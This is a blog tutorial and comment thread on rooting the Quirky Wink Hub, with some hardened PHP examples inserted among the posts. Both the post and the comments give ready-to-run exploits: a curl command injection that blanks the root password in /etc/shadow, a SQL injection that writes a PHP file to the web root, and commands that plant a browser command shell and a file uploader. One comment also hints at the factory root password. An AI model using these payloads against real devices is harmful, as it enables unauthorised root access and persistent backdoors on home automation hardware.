Rooting The Quirky Wink Hub

As you may know, the Quirky Wink Hub is an affordable home automation device containing the following radios: WiFi, Bluetooth, ZigBee, Z-Wave, Lutron, and Kidde. It operates through the Wink app, connecting via a cloud server. It is sold at Home Depot and Amazon.

Well, that’s good, but what if we want to take matters into our own hands? The device is a nice little Freescale i.MX283-based Linux box that we can have some fun with, especially with all the radio support.

Luckily, the enterprising crew at GTVHacker has discovered a nice exploit that makes rooting this hardware quite easy: http://dc22.gtvhacker.com/index.php/Wink_Hub

This is briefly discussed at:  http://hackaday.com/2014/08/09/defcon-22-hack-all-the-things/

Unfortunately, this is patched in the most recent update: the set_dev_value.php file has been removed. So be sure to do this before you have connected the hub to the internet.

But what about a how-to?

Let’s get to it:

Plug in your Quirky Wink Hub and connect to the default WiFi AP that it creates.

Using cURL or similar, send the following command to the lighttpd server to remove the root password:

curl "http://192.168.0.1/set_dev_value.php" -d "nodeId=a&attrId=;cp /etc/shadow /etc/shadow.bak;sed -i 's/root:.*:\(.*:.*:.*:.*:::\)/root::\1/' /etc/shadow;cat /etc/shadow;"

We should be able to access the shell now through the UART using a 3.3V TTL adapter.

If we don’t have the hardware to do that, there is another option. You can use the tftp command to bring over a replacement RSA key file for dropbear (which runs on the device by default), or use another cURL command to append your public RSA key to the /root/.ssh/authorized_keys file; then you can access the device through SSH. Or you can create a new PHP file to preserve shell command access through the web server.

Now that we have access to the device, we notice that there is a web interface available by default at /devices.php. This allows us to view and control the home automation devices linked to the hub. However, the control part does not work, since the set_dev_value.php file has been removed. We can restore that function by editing the /var/www/set_dev_value.php file as follows:

$cmd = 'aprontest -u -m ' . $nodeId . ' -t ' . $attrId . ' -v ' . $v;

So we have a fully functional web interface to view and control the status of our connected devices.  We can use this as an API.
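Restoring that line as written also brings back the shell command injection the curl command above relies on, because nodeId, attrId and the value are concatenated straight into the command string. Below is an added example (not the hub's shipped file) of a set_dev_value.php that validates each field and quotes the value before calling aprontest; it assumes the POST fields are named nodeId, attrId and value (the last name is a guess), that node and attribute ids are plain integers, and that aprontest is on the web server's PATH.

```php
<?php
// Hardened form of the restored set_dev_value.php command line from the post.
// Added example, not the hub's shipped file. Assumptions: the POST fields are
// named nodeId, attrId and value (the last name is a guess), aprontest is on
// the web server's PATH, node and attribute ids are plain integers, and the
// character set allowed for values is deliberately narrow.

function build_aprontest_cmd(array $post)
{
    $nodeId = isset($post['nodeId']) ? $post['nodeId'] : '';
    $attrId = isset($post['attrId']) ? $post['attrId'] : '';
    $value  = isset($post['value'])  ? $post['value']  : '';

    // Ids must be non-negative integers, so a payload such as the
    // ";cp /etc/shadow ..." attrId from the post is refused before any
    // shell is involved.
    $opts = array('options' => array('min_range' => 0));
    if (filter_var($nodeId, FILTER_VALIDATE_INT, $opts) === false
        || filter_var($attrId, FILTER_VALIDATE_INT, $opts) === false) {
        return null;
    }

    // Values are limited to a short token and single-quoted for the shell
    // anyway, so widening the character class later stays safe.
    if (!preg_match('/\A[A-Za-z0-9_.-]{1,32}\z/', $value)) {
        return null;
    }

    return 'aprontest -u -m ' . (int) $nodeId
         . ' -t ' . (int) $attrId
         . ' -v ' . escapeshellarg($value);
}

if (PHP_SAPI === 'cli') {
    // Constructed self-check: a legitimate request, then the injection shape.
    $good = build_aprontest_cmd(array('nodeId' => '1', 'attrId' => '2', 'value' => 'ON'));
    $bad  = build_aprontest_cmd(array('nodeId' => 'a', 'attrId' => ';cat /etc/shadow;', 'value' => '1'));
    echo "good request -> ", $good, "\n";
    echo "injection    -> ", ($bad === null ? 'rejected, nothing executed' : $bad), "\n";
} else {
    // Web request: refuse anything that did not validate, otherwise run it.
    $cmd = build_aprontest_cmd($_POST);
    if ($cmd === null) {
        header('HTTP/1.1 400 Bad Request');
        exit("invalid nodeId, attrId or value\n");
    }
    exec($cmd, $output, $retval);
    header('Content-Type: text/plain');
    echo implode("\n", $output), "\n";
}
```

Run it with the PHP CLI to see the two constructed cases, or drop it in as /var/www/set_dev_value.php to serve devices.php.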

To add devices, we can do so using the aprontest binary which prints some nice help instructions when run with no arguments.

If we want to block the cloud connections and updates we can add the following entries to the hosts file:

127.0.0.1       hub-api.winkapp.com
127.0.0.1       hub-updates.winkapp.com
127.0.0.1       wink-hub-images.s3.amazonaws.com

Finally, we want to connect the hub as a client to our own WiFi network.  We can do so by POSTing the WiFi network information to the web server on the hub as follows:

curl "http://192.168.0.1/index.php" -d '{"ssid":"my_ssid","pass":"my_wifi_password"}'

As you can see the network parameters are just JSON encoded.

For some reason, these settings don’t seem to be saved to the database, so they don’t persist through a reboot. Possibly this is because we did not create a user account with a valid token. So we can

cp /database/wpa_supplicant.conf /etc/

Then we can edit the /etc/init.d/S41wireless file to reflect the new location of wpa_supplicant.conf.

It might seem that we can prevent these settings from being deleted, if we have not created a Wink account, by doing:

touch /database/oauth

No, apparently the oauth file gets deleted if it is invalid, so instead we need to edit /etc/init.d/S31platform to prevent it from deleting our wpa_supplicant.conf file.

Well, we should have a nice Quirky Wink Hub completely under our control now and ready to serve us faithfully without help from the cloud.


149 thoughts on “Rooting The Quirky Wink Hub”

  1. I wonder if we can roll back the firmware at all, or if a new entry vector could be uncovered by downloading the firmware and unpacking it.

    Thoughts?


    • FYI, I was able to do all my work on the firmware on the hub itself.. mounting the ubi FS was a pain in the behind on a normal linux box (that’s what it uses.. UBIFS (a followup to JFFS2). Rolling back to an earlier firmware shouldn’t be an issue, though I’m not sure why you’d need to (at least not yet).


  2. I manually updated both of mine to the newest firmware. All I did was modify the upgrade/platform scripts, to just pull down the updater files, flashed them manually, modified the updater rootfs so it wouldn’t auto start upgrading, when it came back up, i ssh’d back in, manually pulled down the new uImage and rootfs, flashed them, mounted the new rootfs, copied back over my authorized_keys, fixed dropbear (to allow root), reedited /etc/hosts, and put back the php file (just in case). rebooted, both are running the newest image with access intact.


  3. Yes, Daniel B is correct. If you study the updater scripts you can definitely manually install firmware updates without too much trouble. Just be sure you don’t lock yourself out and for safety you may want to change the uboot timeout from 0 to 5 using fw_setenv.


  4. CentOS didn’t want to make UBI very easy, but then, this server is mainly for VMs. Either way.. The only oddball thing I’ve noticed is that the hub is very apt to drop the wifi link unless i leave a constant ping running on it, to ‘force the line active’.. it doesn’t seem to have a very good wifi antenna, considering where it is in relation to my AP. I do have the API address allowed though, so i can use the app with it (it can’t get updates though, that’s been neutered).


  5. I installed and updated my hub before finding these instructions – I assumed there was a local JSON interface available officially 🙂 Is there a way to revert the firmware once it has been updated? I am capable of soldering to the UART or JTAG pads if necessary, but maybe the bootloader looks for a local image over TFTP if the reset button is held, or there’s a Freescale flash utility I could use.


    • I doubt about the tftp bit.. though, you may not be out of luck now. After my first hub got updated before i worked out how to manually do it. (which btw, there’s no reason i can think of to revert the firmware as of yet, since once you’re in manual control of the updates, you can manipulate any future updates. the UART will give you console access.. and as it turns out.. I have the root password.. yes.. you read that right.. Obviously, i’m not going to post it in here. that being said, I’m willing to help you out, offline of this wordpress.


  6. Whoa! I just checked back, and finally saw that comments were happening.

    I was playing around with my Hub a little bit and let it update because I found that the Wink API (http://docs.wink.apiary.io/) does have access to the Hub and items, it’s just not documented at all. I grabbed my authorization token by sniffing traffic between my iPhone and the Wink API server.

    I’m considering switching it out… just not sure if I’ll be able to get a non updated one. Also other than having local access, don’t know if I’ll really need it at this point since the commands can be sent through the API. Just have to keep poking around to see what commands work.


    • Yes good to see that support is developing on the cloud API including some hub references in the docs. Somewhat troubling that the credentials can be intercepted (without SSL MitM?).

      It seems very unlikely that factory updated units have made it to retail, but I guess it depends on the production schedule.

      Feel free to share your experiences with the cloud API.


  7. So, I apologize but I’m a total novice. Probably shouldn’t be attempting this. However, I am and wondered if anyone could help RE: “cURL command to append your public rsa key to the /root/.ssh/authorized_keys file”. I’ve done this. I’m able to read the file and see that indeed my rsa key is there. However, I’m still getting permission denied when trying to SSH in (using -i to point to my local private key). Any help would be greatly appreciated.

    While I’m bothering people, can I ask has anyone poked around with the Lutron radio? Will the same commands you can send to the RadioRA2 box work on the Wink Hub?


  8. First of all, thanks for putting this together. This is my first time rooting anything (unless you count flashing firmware on a WRT54G 10 years ago). I was able to remove the root password, set up SSH, modify the hosts file and set up the wpa_supplicant.conf file. But after I modified the S31platform file and rebooted, the unit was bricked. The LED is solid pink and the AP is dead. My guess is that I made a mistake when I modified S31platform. I have included it below. Does anyone know what I did wrong?

    #if [ ! -e /database/oauth ]; then
    # rm /database/wpa_supplicant.conf
    #fi

    if [ ! -e /database/wpa_supplicant.conf ]; then
    /root/wifi/run_ap.sh start
    fi


    • I managed to do the same thing. I am going to crack open the case, and log in via the UART. I have lots of 3.3 v to USB widgets here for Arduino programming, so this should be easy enough. I may even leave it attached, so when I brick it again…


      • So I connected to the terminal but am not getting a login. I can see the boot output, and it is different from what is found here https://www.dropbox.com/s/3g37fqe02d4tetd/boot.txt

        It looks like it is unable to find zwavetest file in /usr/sbin, the SQL queries in the Zigbee init are rejected, and it can’t read /root/.monit.id

        and it doesn’t appear that getty is starting, or at least it is not letting me login from the console. (This has not been updated so getty should still be active). I just keep getting a loop of IPC status messages.

        Whatever is not working, it is more than just a problem with my edit of S31platform. It seems like there are other files that are corrupt.

        Micheal, if you are able to connect, let me know what you find. Hopefully you are not in the same boat (maybe there is something wrong with my terminal).

        Also would the ethernet port be active? Since I already have the keys setup, i could still connect to dropbear with a physical connection. I don’t see any indication that an eth is being initialized from the boot script.


  9. So I got a bit over-excited and set up my new Wink Hub and ran an update.. Then I looked online and found this page.. D’oh!

    So, is there any way to revert back to older firmware? Or am I screwed and I should go exchange the hub?

    Any other injection possibilities? Has anyone sniffed the communication between the mobile app and the hub when it’s sending over the WiFi parameters?


    • So I had some thoughts.. Does the Wink hub have a script that checks a server if there are any updates? Could this be a possible way to inject a custom update image which would allow root access??


    • Been running JohntheRipper on the password hash for the last couple of days.. but unfortunately login over UART has been disabled in the latest FW (as posted above)

      If you can figure out a way for it to boot into the update partition, then all exploits are still available there..


      • 8. and there’s a space in the middle. Here’s a hint, since I don’t want to put it in here, and have them (Wink) see it exposed… Google has an APP for taking notes. The name of that APP is the first part of it. (pw is all lowercase, app is emphasized for a reason..) If you can figure it out from this, give yourself a cookie.


  10. I’ve attached my usb-to-serial adapter to the uart port of a brand-new, hackable hub (the PHP script is intact) , but I don’t see any output. What’s the secret to get it to work?


  11. I created some server scripts and an Android app for controlling the wink hub on your local network. It’s pretty alpha, but it allows you to create groups of devices, scenes with presets for each device and write configurations to NFC tags. It only supports dimmable bulbs right now, but if there is interest, it’s easy to expand. https://github.com/nashira/blink


      • Found this solution:
        #13. One more last step before we disconnect, edit the following file,

        $vi /etc/init.d/S31platform

        and look for the following lines,

        if [ ! -e /database/oauth ]; then
        rm /database/wpa_supplicant.conf
        fi

        and edit the rm /database/wpa_supplicant.conf to rm /database/wpa_supplicant.conf1. I tried commenting the line but ran into issue. So i end up adding a 1 at the end, since the file anyway won’t be there.


      • I actually signed up for a wink account before realizing that all commands would be routed through wink’s servers so I created a log in, but blocked the updates host before the hub had a chance to update.


    • Nash, I’m looking to send commands to the Hub directly by running scripts on a Linux box (RaspPi). Can you give us some pointers on how to run commands to turn bulbs on/off and change brightness?

      Thanks for your work!


      • For the Android app I just use `aprontest -u -m -t -v `. That has to be run on the hub itself. It looks like aprond opens a socket to the wink api, I’d really like to know more about how that works.


  12. I’m trying to avoid having to use the UART to be able to login, and I issued this command to modify the authorized_keys file:
    curl "http://192.168.0.1/set_dev_value.php" -d "nodeId=a&attrId=; echo 'rsa text' >> .ssh/authorized_keys;"

    The file looks ok as there is now two keys on the authorized_keys file, but I’m still unable to login via ssh… is there a way to turn on telnet or something instead?


  13. 3 questions:
    1. i’ve rooted my wink; does this mean it wont connect to the cloud for accessing the normal UI in the app itself? i know we’re blocking the firmware updates..but can the wink be used as before, only with root access now?

    2. is there a way to ensure future firmware updates won’t remove your root password? or is there always the possibility a future update will erase root access?

    3. i think i figured out the original admin password – can you email me at mcoder AT gmail and tell me what it is?


  14. oh and i’ll be happy to help out the other poster who built the android app..i see a lot of potential in that ‘blink’ app for those who want a complete ‘local’ solution if you can add/name devices that way.


    • Cool deal.. I must have missed about the app… yeah.. i have 2 hubs.. (i always get 2 of something, so i have a backup, when it’s something i’m going to hack on)…. I probably won’t really use the wink stuff for its purpose, since i have an Almond+. lol


      • I’d like to find a way to send API commands directly to the Wink by running a script. It looks like the Android app might shed some light on how to do this. If anyone comes up with something, I’d be interested.

        I also would like the original admin password if you please. starwarsasdf at gmail.


    • One fairly easy feature I’m thinking about implementing is using the command injection exploit to install the server scripts right from the app, for a one-click experience. And the app doesn’t modify the system in a way that would interfere with using the wink app over the internet, so you can use both together. Also I think the wink api is pretty well documented, so it may be possible to build that into Blink too. Let me know what features you are interested in for prioritization. I’ve added the ability to rename devices, and I’ll add the ability to add and remove them tomorrow.


      • Nash that’s awesome!! Yes that would be really slick. You’re on to something making your app work locally if wink is down or allowing use of the wink hub as normal.

        What can we do to help? I think your little app here might suddenly take off!


      • One last question.. Is it possible to get the app to install the neutered firmware since the current wink app won’t allow you to add devices if your hub isn’t running the current firmware?


      • Nash, thanks much for your work on this. I’ve had nothing but problems with the cloud app working intermittently. As of now my devices show on devices.php but not in the Wink app- they are completely unresponsive and need to be removed manually for it to even detect them. Can’t wait to bin this for a local solution.


  15. I keep getting this when I try to enter in my SSID and password –

    Slim Application Error: The application could not run because of the following error: Type: ErrorException, Code: 8, Message: Trying to get property of non-object, File: /var/www/index.php, Line: 54. Trace:

    #0 /var/www/index.php(54): Slim\Slim::handleErrors(8, 'Trying to get p...', '/var/www/index....', 54, Array)
    #1 [internal function]: {closure}()
    #2 /var/www/Slim/Route.php(462): call_user_func_array(Object(Closure), Array)
    #3 /var/www/Slim/Slim.php(1326): Slim\Route->dispatch()
    #4 /var/www/Slim/Middleware/Flash.php(85): Slim\Slim->call()
    #5 /var/www/Slim/Middleware/MethodOverride.php(92): Slim\Middleware\Flash->call()
    #6 /var/www/Slim/Middleware/PrettyExceptions.php(67): Slim\Middleware\MethodOverride->call()
    #7 /var/www/Slim/Slim.php(1271): Slim\Middleware\PrettyExceptions->call()
    #8 /var/www/index.php(81): Slim\Slim->run()
    #9 {main}

    [1/2]: “ssid”:”ydkfl”’
    curl “http://192.168.0.1/index.php” -d ”pass”:”QDXMJV24WJKCTBGV”’ –>
    –_curl_–“ssid”:”ydkfl”’
    curl “http://192.168.0.1/index.php” -d ”pass”:”QDXMJV24WJKCTBGV”’
    curl: (6) Could not resolve host: “ssid”

    [2/2]: ”pass”:”QDXMJV24WJKCTBGV”’
    curl “http://192.168.0.1/index.php” -d ”pass”:”QDXMJV24WJKCTBGV”’ –>
    –_curl_–”pass”:”QDXMJV24WJKCTBGV”’
    curl “http://192.168.0.1/index.php” -d ”pass”:”QDXMJV24WJKCTBGV”’
    curl: (6) Could not resolve host: ”pass”


  16. FYI, received Home Depot wink on 12/2/2014… I was able to root by curl adding the RSA key from a windows box using windows curl.exe. Note that the + signs in the public key turn into spaces if you’re not careful. I replaced the +s with %%2b which translates to a + and all was well. Now to figure out how to get an iPhone app talking directly to a rooted wink hub…


  17. There is a SQL injection vulnerability in dev_detail.php. The id parameter gets passed directly into the query via POST:

    function buildDeviceDetail($dev_id)
    {
    $info = "";
    $attrs = "";
    $values = "";
    $result = null;
    $query = "SELECT interconnect,userName FROM masterDevice WHERE deviceId='" . $dev_id . "';";
    $row = db_fetch_row($query);
    ...
    }

    $dev_id = $_POST['id'];
    //$prot = $_POST['prot'];
    //$type = $_POST['type'];
    buildDeviceDetail($dev_id, $prot, $type);

    I'm not the best with SQL injection and I'm still playing with it, but it may be another possibility to get back in for those who updated.

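A parameterised version of that query, added here as an example rather than the hub's own code: it uses PDO's SQLite driver (assumed available on the hub) in place of the db_fetch_row() helper and keeps the masterDevice table and column names from the comment. It also assumes device ids are integers; if they are not, drop the integer check and bind with PDO::PARAM_STR, since the binding alone is what stops the injection.

```php
<?php
// Parameterised replacement for the buildDeviceDetail() query quoted in the
// comment above. Added example, not the hub's code: it uses PDO's SQLite
// driver (assumed available on the hub) instead of the db_fetch_row() helper
// and keeps the masterDevice table and column names from the comment.

function fetchDeviceRow(PDO $db, $dev_id)
{
    // Device ids are assumed to be integers; anything else is refused early.
    if (filter_var($dev_id, FILTER_VALIDATE_INT) === false) {
        return null;
    }

    // The id is bound as a value, never spliced into the SQL text, so a
    // quote-break such as "1 or 1=1'; ..." cannot alter the statement.
    $stmt = $db->prepare(
        'SELECT interconnect, userName FROM masterDevice WHERE deviceId = :id'
    );
    $stmt->bindValue(':id', (int) $dev_id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory copy of the table so the function can be exercised
// without touching the hub's real database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE masterDevice (deviceId INTEGER PRIMARY KEY, '
        . 'interconnect TEXT, userName TEXT)');
$db->exec("INSERT INTO masterDevice VALUES (1, 'zigbee', 'Kitchen bulb')");

print_r(fetchDeviceRow($db, '1'));              // the genuine device row
var_dump(fetchDeviceRow($db, "1 or 1=1'; --"));  // refused before the query runs
var_dump(fetchDeviceRow($db, '2'));             // no such device

// In dev_detail.php the call would be fetchDeviceRow($db, $_POST['id']).
```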

  18. It looks like the .shell command is disabled in sqlite, but .output is enabled so a carefully crafted sql injection exploit should be able to create a new php file that enables shell execution.


      • Can you do a test for me? I’ve worked out how to create a php file using the SQL injection, but I haven’t been able to get the content right. But just to make sure the injection vulnerability still exists on the updated hub can you try this:

        curl -d id="1 or 1=1';ATTACH DATABASE '/var/www/lol.php' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES ('';--" http://192.168.0.1/dev_detail.php

        Then tell me what you get when you access http://192.168.0.1/lol.php?cmd


      • Hmmm. It seems wordpress is stripping out the interesting bits between the single quotes after

        VALUES (

        in the above command. Probably misinterprets it as an attempt at cross site scripting. Bummer. I’ll see if there’s another way to post it here… But the command as it appears will still be sufficient to tell me if it’s creating the php file or not, so please still try it, and I’ll keep working on getting the right content.


      • Oh, I should add that if for some reason the first step gets screwed up and the database isn’t written correctly there’s no way to drop the database via SQL commands in sqlite and it won’t be updated by rerunning the script. You’ll need to either change the sql_cmd.php filename to something else or modify the script so it doesn’t error out trying to create an already existing database.


      • Eureka! I’ve pwned the patched wink hub using a SQL injection! It remains to be seen whether or not I can post the actual exploit here, I may have to post it elsewhere then link back to this.

        But–if you lost root by updating incorrectly, you’ll be able to get back in very shortly… Trust me, it’s easier than the process of safely updating!


  19. for those who still have an unpatched hub, i’ve written a web based cmd, so it’s easier to play around if you have not yet set up ssh access
    curl “http://192.168.0.1/set_dev_value.php” -d “nodeId=a&attrId=;echo ‘<input type=\"text\" name=\"command\"/value=\"\”><?php if(isset(\$command)){\$cmd = \"sudo \" . dirname(__FILE__) . \"/php2apron set_value a ;\" . \$command;\$o=exec(\$cmd,\$output,\$retval); print \$command . \"\”; print \$cmd . \”\”; print \$o . \”\”; print \”retval:\” . \$retval . \”\”;print \”\”; foreach (\$output as \$line) { echo \$line.\”\n\”; } print \”\”;}?>’ > /var/www/cmd.php”

    Then go to your browser to access it
    http://192.168.0.1/cmd.php


    • for easy uploading of files, i’ve written upload.html and upload.php
      curl “http://192.168.0.1/set_dev_value.php” -d “nodeId=a&attrId=;echo ‘Select image to upload:’ > /var/www/upload.html”

      curl “http://192.168.0.1/set_dev_value.php” -d “nodeId=a&attrId=;echo ‘<?php \$target_dir = \"/var/www/\"; \$target_file = \$target_dir . basename(\$_FILES[\"fileToUpload\"][\"name\"]); \$uploadOk = 1; \$imageFileType = pathinfo(\$target_file,PATHINFO_EXTENSION); \$move = move_uploaded_file(\$_FILES[\"fileToUpload\"][\"tmp_name\"], \$target_file); print \"

      \"; var_dump(\$move); var_dump(\$_FILES); ?>' > /var/www/upload.php"
      
      go to your browser and access it
      http://192.168.0.1/upload.html
      
      enjoy! :)
      


  20. Daniel – can you specify which server or server(s) we block access to and still be able to use the mobile app?

    Any chance of you doing a detailed write-up of how to manually update the firmware without losing root?

    Thanks


  21. I’ve got the hub rooted and wireless running. I can also pair with the GE bulb. I can’t seem to control the bulb however. When I try to send an aprontest command it seems to go through and I can see the values updated with an aprontest -l -m1 but nothing actually happens to the bulb itself. What gives? Also, is it possible to hook the hub to the cloud AFTER I’ve already paired it with my wifi? The phone app at this point can’t seem to do it because it’s still assuming its directly connected to the hub. I’d rather not have to do any OAUTH token sniffing…


    • Nabors says how to reconnect. Yes, you have to delete the wpa_supplicant and restart it so it goes back to default. The hub doesn’t update by itself (you’ll see an update button at the bottom of the App, don’t press it or block the image IP addresses as already illustrated). You can connect and control stuff through the App. You also don’t have to sniff any oauth tokens, they’re in /database/oauth, but they’re useless unless you want (for some reason) to connect to the wink cloud services on your own. The real point of rooting is to take the wink cloud out of the loop.

      With regard to your bulb, are you trying to turn them on or off? If you’re having trouble turning them on can you turn them on manually (they default to on when you turn off the light switch for a bit then turn the light switch back on). And are you sure the light switch is on? 😉


      • Haha yes, the light switch method works just fine 🙂 I’m trying to use aprontest to control the brightness and power while the bulb is “on” (aka light switch is on). I can run the update command but nothing is happening with the bulb.


  22. I left the hub-api.winkapp.com out of the host file and deleted the file as suggested. The app was able to connect to the hub, but I can’t now connect devices. Once I select Link Light Bulb – it won’t let me click NEXT. The Hub Update Required is at the bottom like Kent says. Is it possible that the app is blocked from adding devices if there is an update needed?


    • Most likely, yes. That wouldn’t be that hard for them to do, and would actually be smart, if there was a critical enough bug, that way forcing the update. There’s nothing that says you can’t do a manual update, however.


  23. daniel, can you confirm what update is necessary (version and where its at?) and if manually installing it removes root? just trying to understand if there’s more than one file that gets updated with the firmware and if you can omit the files that remove your password.


    • Manually installing will never ‘remove root’.. well, not really, because you’re in control of the update process, as it were. As for version, etc.. I’d have to see.. but basically, the update gets pulled down after it’s flashed and rebooted to the ‘updater’ partition.. the updater is just a bootstrapper, it doesn’t contain the actual update (so updating is actually 2 steps, when the system does it by itself)


  24. The manual update procedure in the link above is not detailed enough for me to be able to complete confidently. I would be worried about bricking. It is also dated back to Sept.
    It says “So far only the application rootfs has been updated…” is this still true?
    Also ” At this time the update is small enough that we can download it to /tmp and flash it using:
    ubiformat /dev/mtd5 -f /tmp/app-rootfs.ubi ” Is this still true?


    • I didn’t use the above link, i did my manual update simply by looking through the update scripts and modifying them to remove anything harmful and then letting them run. (just to avoid mass cut and pasting) I’ll try and get some time tonight to take a look at the current update stuff.


  25. A work around is to install an older version of the wink app 2.0.3.5, then add all appliances, then update the phone app. Not ideal but it works. Lights work anyway.

    Something else I noticed is the app is trying to send me an email to confirm I am “a real person” and the email is not going out. Maybe blocking the other servers is causing this. Would this affect the robot emails going out. Not sure if robots will work at all, more testing.


  26. what are the facets of this so far:
    1. possible a sql exploit can restore root to an updated hub?
    2. wink-api needs to be removed from your hosts file in order to connect to phone app
    3. older version (downloaded from apk_downloader.org site) required to set up devices for now since the latest wink phone app does a firmware check prior to allowing devices to be added.
    4. possible manual firmware update does not lose root, so maybe #3 isn’t required if the manual update process is working properly?
    5. some tools have been built by a couple of posters here to make the root process easier..do we have a step-by-step for them yet to use as a guide?
    6.


    • Yes. I haven’t had issues adding devices on my hacked, manually-updated hub.

      The way I did it was mostly using the instructions here:
      1. mount update partition
      2. modify partition (ssh access, remove or change root password, edit S99local script so update doesn’t start automatically)
      3. modify DO_UPDATE and reboot
      4. edit upgrade scripts ( I just modified them to not reboot after they are done. So It’s able to run through the whole automatic process, and then just stop)
      5. run update script
      6. mount app partition
      7. modify app partition to re-enable ssh, change/remove ssh password, run console on UART, etc.
      8. modify DO_UPDATE to boot to app partition
      9. reboot and hope for the best!


    • I attempted the manual upgrade but now my Wink may be bricked.
      It’s only showing a green light.
      Do you think I can still recover if I had UART?


      • I had the same issue after I upgraded. It turns out that setting the bootloader wait time to 5 would cause it to hang unless I had a UART connected. I changed it to 2 (or 3, I don’t remember now) and it boots fine now. Try that if you have access to a UART.


  27. Daniel, what did you need to do for dropbear when manually updating? I’ve updated a unit and retained root but didn’t find a need to edit anything there.


    • i modified the startup parameters so that it allows access via password. I also changed the root password.

      Just make sure that dropbear is set to start and you should be ok.


  28. This is odd. I’m using a CP2101 chipset UART (not sure if there’s an issue with this dongle). I can’t get output out of it. When I have the serial connected, I hit enter and the Wink Hub boots and everything is good, but still no output from serial.
    When I allow it to boot on its own without the UART connected, it just sits there with a solid green light.
    Is the bootloader interactive?
    Also, is the CP2101 UART compatible?


    • What did you set the boot_wait parameter to?

      I use a raspberry pi as my uart interface.

      What parameters are you using for the uart? which pins are connected?


  29. quick question..can you set up the hub as normal and simply elect to not upgrade it and be able to root it later on? i know some folks who are not very technical that are sitting on their hubs in hopes of a more refined rooting process who would like to play with it in the interim.


  30. On my Android app, it bugged me about upgrading and wouldn’t let me add anything without updating. The slickdeals site above has links and info to real simple rooting and a post on an easy updating the hub after rooting.


  31. working exploit:
    curl -d id="1 or 1=1';ATTACH DATABASE '/var/www/exploit.php' AS lol; CREATE TABLE lol.pwn (t TEXT); INSERT INTO lol.pwn (t) VALUES ('');--" http://10.0.0.88/dev_detail.php


      • Well, there’s the conundrum, huh. If it’s posted, even obfuscated, they’ll know what to patch. If I keep it to myself I can keep exploiting my hubs but nobody else gets the benefit…


      • I know.. and I agree. It’s always a tricky game of cat and mouse. I’ve dealt with too many platforms like this with having to deal with this sort of ‘issue’. Matter of fact, right now i’m having to poke at raw memory because the manufacturer of this quad video encoder card wants $250 to fix a card that their firmware update trashed.. so out came the jtag, etc.. (because they won’t give out the root pw)


  32. Nope, sadly the wordpress mechanisms on this site are stripping out the key parts of the sql injection attack. I’ll post somewhere else shortly and add a link here.


  33. curl -d id="1 or 1=1';ATTACH DATABASE '/var/www/exploit.php' AS lol; CREATE TABLE lol.pwn (t TEXT); INSERT INTO lol.pwn (t) VALUES ('');--" http://10.0.0.88/dev_detail.php


  34. I posted a how to using sql injection on pastebin last night, but for some reason both my comments with pastebin links have been moderated out, leaving only one nonsensical follow up above since the previous post never showed up. What gives?


  35. Well let’s try this again…no link, just copy and paste the urls.
    Run the following via curl (escaped for curl in windows, linux users might have to modify)

    pastebin.com/hL02F3Vv

    With that you can now run arbitrary commands at sql_cmd.php?cmd=cmd_goes_here, and we’ll use that to add some more convenient php pages as suggested by cyber01. Just enter the text in the following pastebins in your browser:

    pastebin.com/0Hjn5wcN
    pastebin.com/KZhdserd

    Now you can go to upload.php and cmd.php and use them as you see fit.


    • thx Rezurok and others.
      I didn’t get your posted curls to run from a remote unix box, nor from root on the winkhub.
      Seemed to be a permission issue in the first case.
      Winkhub didn’t know echo.
      I instead went into /var/www/ with root and vi’d my way to creating upload.php and upload.php.
      Good idea and tools for future use..


    • I’ll actually have to modify the scripts and post.. I had forgotten, I just saved the original scripts off, and modified the commands /picked/chose as I went.

